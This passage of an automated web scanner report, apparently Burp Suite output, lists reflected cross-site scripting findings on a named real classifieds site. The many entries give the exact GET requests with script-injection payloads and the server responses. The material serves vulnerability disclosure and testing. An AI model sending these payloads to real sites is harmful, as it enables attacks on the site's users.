HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:39 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=df493d631799b3ae71a3f47afed2e73f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=34ce2d0beacf8aab4c6971699d3feea3; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1GNTJCQjU1OTRENTBBQjQ3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fce6"><script>alert(1)</script>8fbf846dde5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post1fce6"><script>alert(1)</script>8fbf846dde5/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:38 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=9c639fd8a2bc4f978acdc8be6e356431; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=5729656fe7e1ac9653ac58e5ac096a07; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1GNEMyMDNCQTRENTBBQjQ2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.140. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05d5"-alert(1)-"d62825c243a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post/?f05d5"-alert(1)-"d62825c243a=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:32:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=bf5746dabc2d75a50e0a9be6b3f39b8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=e3e0b9b8e19d41b51d5cfd5512137451; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1EMkIxOThCNTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12147
1.141. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23656"><script>alert(1)</script>d50798e020e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post/?23656"><script>alert(1)</script>d50798e020e=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:32:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=4a9ad5ba08b2bce98db1714f0c97b1c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=023646d326636dbb53314fa5866e7dcf; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FODY1REQyNzRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12202
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98a3"-alert(1)-"0c04687f888 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /salec98a3"-alert(1)-"0c04687f888/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=3e2957e9e9845ca07eb98112f1e3830e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=3f7d92644e0d9effef47f2e0e487219b; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BMjk1ODBEMTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d9c4"><script>alert(1)</script>e630142b13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale2d9c4"><script>alert(1)</script>e630142b13f/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=df974b08a505d83f66dd2cb252c59fac; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=031f7d9223c6547f69866b4905e1d99e; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1CQjBDM0JFNjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44400"><script>alert(1)</script>1c630243bd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale44400"><script>alert(1)</script>1c630243bd9/pet/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:19 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=18f597758571f26182c84aac36fd15d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=6a72bb3687c8592cbdca977e15514344; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FQjQ4RTNGRTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fcd"-alert(1)-"4468efc9463 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale91fcd"-alert(1)-"4468efc9463/pet/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:20 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=38857c33b28574753cda78d14a8ace9b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=5b560eb2679cecddb823a1e438f77f3b; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DNDY1NTVEMjRENTBBQjM0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0MDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1fb"-alert(1)-"e6aeb42b202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale5f1fb"-alert(1)-"e6aeb42b202/pet/-/-/10036 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=db3656c2d334c89d48a9aeee00a4eb5b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=89f560fafa0fe008c7944b926fd244f7; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1CNjk0M0JBRTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83116"><script>alert(1)</script>f555724feb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale83116"><script>alert(1)</script>f555724feb1/pet/-/-/10036 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=c3843b8b5645fcdd6180b66333ff6f5a; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=dfb363d6a7c622fa5c08d0a7920319b1; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FREVGRTIyQjRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5174a"><script>alert(1)</script>66e0d334f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale5174a"><script>alert(1)</script>66e0d334f09/tickets/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=8ca8783bcde0e3626257fd40f50ea31d; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=30a88cbede95e73839d97f2865251fc5; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1GNUI0RjY2QzRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0b4"-alert(1)-"053f4fbbe15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sale9d0b4"-alert(1)-"053f4fbbe15/tickets/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=3b61d0721f4fb880e9a17c2f9aa52889; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=df011aa9b8df249936f6144bc05e0903; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FNTEzRTk5NzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21606"-alert(1)-"33cb9a6747e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service21606"-alert(1)-"33cb9a6747e/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=961aebc58092c07654941cb71392979f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=5b9b87405ffdd0c0ff7ccaebb488832c; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1COUJBQTJGMzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d866"><script>alert(1)</script>de5810db0a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service6d866"><script>alert(1)</script>de5810db0a0/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=eaaeaef750fa18669065f73738f27ea0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=196dd52b54953fa6764c5bbe3ca1ec50; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BRkY5QTJEMjRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c63e6"-alert(1)-"5639a7966a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehiclec63e6"-alert(1)-"5639a7966a2/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=fe0fad65bfacf582cd36a941dbe67490; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=80adaedeb7751b407e9ec87d32a8c8c0; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FMEJBMkQxOTRENTBBQjI0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656a4"><script>alert(1)</script>f50e8208b9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle656a4"><script>alert(1)</script>f50e8208b9e/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=b3b8561b90fc3f030b737c9ebd7877d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=f776fafc6849cd0dcc840f8ea95bbf82; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FRjA5ODE0QzRENTBBQjIz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbc5"><script>alert(1)</script>9cbc9beb40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle5dbc5"><script>alert(1)</script>9cbc9beb40d/boat/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=9cdaa04fd4d7646363a987637fa4b753; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=4a72348e669d11d12a73b3d78040960d; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1GQjE3RDUzQzRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f232"-alert(1)-"4ea6d28509e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicle1f232"-alert(1)-"4ea6d28509e/boat/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=36e66ec1ebc2e0e32c4eb13444e459b5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=0d8c04fbb2d94f12fe43bf23ba8956e2; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1CN0E1NENBRjRENTBBQjI5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyOTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ef8b"-alert(1)-"57866654706 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicle8ef8b"-alert(1)-"57866654706/commercial_truck/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
